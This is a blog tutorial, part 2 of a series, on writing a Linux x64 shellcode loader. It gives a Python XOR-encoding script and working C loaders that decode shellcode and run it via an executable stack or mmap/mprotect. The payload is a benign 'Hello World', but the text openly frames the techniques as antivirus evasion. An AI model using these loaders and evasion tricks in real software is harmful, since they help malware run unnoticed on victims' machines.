So 28 Januar 2018

A simple, yet complete shellcode loader for linux x64 shellcode - Part 2

This is a series consisting of Part 1, Part 2.

XORing the shellcode

Until now, we didn't obfuscate the bytes of our shellcode at all. The first, and very easy approach we want to try now is XORing it with a constant, hardcoded value, let's say 0x41 or 'A'. To get this, we use the following, very simple Python script:

$ cat xor.py
#!/usr/bin/env python3

# This is the "Hello World!" shellcode from part 1.
shellcode = b"\xeb\x1e\xb8\x01\x00\x00\x00\xbf\x01\x00\x00\x00\x5e\xba\x0c\x00\x00\x00\x0f\x05\xb8\x3c\x00\x00\x00\xbf\x00\x00\x00\x00\x0f\x05\xe8\xdd\xff\xff\xff\x48\x65\x6c\x6c\x6f\x20\x57\x6f\x72\x6c\x64\x0a"

for x in range(0, 256):
    ret = ""
    for i in bytearray(shellcode):
        xored = i ^ x
        ret = ret + ("\\x%0.2X" % xored)
    print("xored with %0.2X is \"%s\"" % (x, ret))

$ python xor.py | grep 'xored with 41'
xored with 41 is "\xAA\x5F\xF9\x40\x41\x41\x41\xFE\x40\x41\x41\x41\x1F\xFB\x4D\x41\x41\x41\x4E\x44\xF9\x7D\x41\x41\x41\xFE\x41\x41\x41\x41\x4E\x44\xA9\x9C\xBE\xBE\xBE\x09\x24\x2D\x2D\x2E\x61\x16\x2E\x33\x2D\x25\x4B"

Running the XORed shellcode

Ok, now we have our correct shellcode, we try to run it like before:

$ cat shellload_xor.c 
#include<stdio.h>
#include<stdlib.h>
#include<string.h>
#include<stdint.h>

// Hello World shellcode, but bytewise XORed with 0x41
const size_t len = 49 ;
const char xorKey = 0x41;
char shellcodeXOR[] =
"\xAA\x5F\xF9\x40\x41\x41\x41\xFE\x40\x41\x41\x41\x1F\xFB\x4D\x41\x41\x41\x4E\x44\xF9\x7D\x41\x41\x41\xFE\x41\x41\x41\x41\x4E\x44\xA9\x9C\xBE\xBE\xBE\x09\x24\x2D\x2D\x2E\x61\x16\x2E\x33\x2D\x25\x4B" ;

void runShellcodeXORNaive()
{
    // decrypt with 0xFE
    for (size_t i=0; i < len; i++) {
        printf("decrypting %uth byte from value %u to value ", i, (uint8_t) shellcodeXOR[i]);
        char tmp = shellcodeXOR[i];
        // beware, bitwise XOR is implicitly promoting those chars to an integer!
        tmp = (tmp ^ xorKey) & 0xFF;
        shellcodeXOR[i] = tmp;
        printf("%u\n", (uint8_t) shellcodeXOR[i]);
    }
    // run decrypted shellcode
    int (*s)() = (int(*)()) shellcodeXOR;
    s();
    return;
}

int main(int argc, char* argv[])
{
    runShellcodeXORNaive();
    return 0;
}

But wait: both of our methods we used in part 1 to bypass Data Execution Prevention (DEP) before are not working anymore! Why?

We cannot declare it as a constant global variable (const unsigned char[]), because we obviously need to change the shellcode when we are XORing it back. But if we don't use const, it will be created on the stack, where it is writeable, but not executable. We will get segfault 7 as in part 1 again.
The other method from part 1, namely declaring it as a string does not work here too. Like before, the shellcode will be put into the executable itself then, which is mapped as readable and executable, but not as writeable! Thus, as soon as we try to overwrite the first byte with the decrypted value, our program will crash with segmentation fault 15 like in part 1.

So, what do we do now? We simply can make the stack writeable by passing the compiler option "-z execstack" to gcc, but this is kind of cheating ;) But let us verify it works:

$ gcc -o shellload_xor -z execstack shellload_xor.c
$ ./shellload_xor 
decrypting 0th byte from value 170 to value 235
...
decrypting 47th byte from value 37 to value 100
decrypting 48th byte from value 75 to value 10
Hello World

Using mmap to bypass protections

But there is also another option not requiring adding any compiler options like -z execstack. We can use memory mapped pages which allows us to allocate memory pages as writeable and change the memory page to executable later on. Then, we do not need any compiler options at all! After reading the manpages mmap and mprotect, the implementation is fairly straight-forward:

$ cat shellload_mmap.c 
#include<sys/mman.h>
#include<string.h>
#include<stdio.h>
#include<stdlib.h>
#include<stdint.h>

// Hello World shellcode, but XORed with 0x41
const size_t len = 49 ;
const char xorKey = 0x41;
char shellcodeXOR[] =
"\xAA\x5F\xF9\x40\x41\x41\x41\xFE\x40\x41\x41\x41\x1F\xFB\x4D\x41\x41\x41\x4E\x44\xF9\x7D\x41\x41\x41\xFE\x41\x41\x41\x41\x4E\x44\xA9\x9C\xBE\xBE\xBE\x09\x24\x2D\x2D\x2E\x61\x16\x2E\x33\x2D\x25\x4B" ;

void runShellcodeXORmmap()
{
    // use mmap to get readable and writeable memory
    char* mem = (char*) mmap(0, len, PROT_READ|PROT_WRITE, MAP_ANONYMOUS|MAP_SHARED, -1, 0);
    if (mem == MAP_FAILED) 
    { 
        printf("mmap failed!\n");
        exit(1);
    }

    // copy encrypted shellcode to the memory we just got from the kernel
    memcpy(mem, shellcodeXOR, len); 

    // decryption (XOR) loop
    for (size_t i=0; i<len; ++i) 
    {
        printf("decrypting %uth byte from value %u to value ", i, (uint8_t) mem[i]);
        // beware, bitwise XOR is implicitly promoting those chars to an integer!
        mem[i] = (mem[i] ^ xorKey) & 0xFF;
        printf("%u\n", (uint8_t) mem[i]);
    }

    // use mprotect to make the memory area readable and executable
    if (mprotect(mem, len, PROT_READ|PROT_EXEC) != 0)
    {
        printf("mprotect failed!\n");
    exit(1);
    }

    // run the shellcode
    void (*s)() = (void (*)()) mem;
    s();
    // munmap is not necessary here, because our shellcode will use exit syscall 
}

int main(int argc, char* argv[])
{
    runShellcodeXORmmap();
    return 0;
}

And voila, it runs:

$ gcc -o shellload_mmap shellload_mmap.c 
$ ./shellload_mmap 
decrypting 0th byte from value 170 to value 235
...
decrypting 47th byte from value 37 to value 100
decrypting 48th byte from value 75 to value 10
Hello World

Conclusion

Modern compiler implement quite some protection measures to prevent self-modifying code. We worked around the non-executable stack by abusing memory mapped pages and have been able to obfuscate our shellcode by simple single-byte XORing it.

Still, we are not finished yet and will need to tackle the following two downsides in part 3 of our tutorial: XOR is not a real "encryption", let us use a better encryption algorithm. Our program is still kind of suspicious as it does write to a memory page which is executed later on. This may be catched by modern anti-virus heuristics. We will work around that by requiring the decryption to take 30 seconds CPU time before our program actually does something evil. No real-time anti-virus software will be able to waste this much CPU time before finishing analysis.

Klaus' Log

A simple, yet complete shellcode loader for linux x64 shellcode - Part 2

XORing the shellcode

Running the XORed shellcode

Using mmap to bypass protections

Conclusion

Social

Categories

Feeds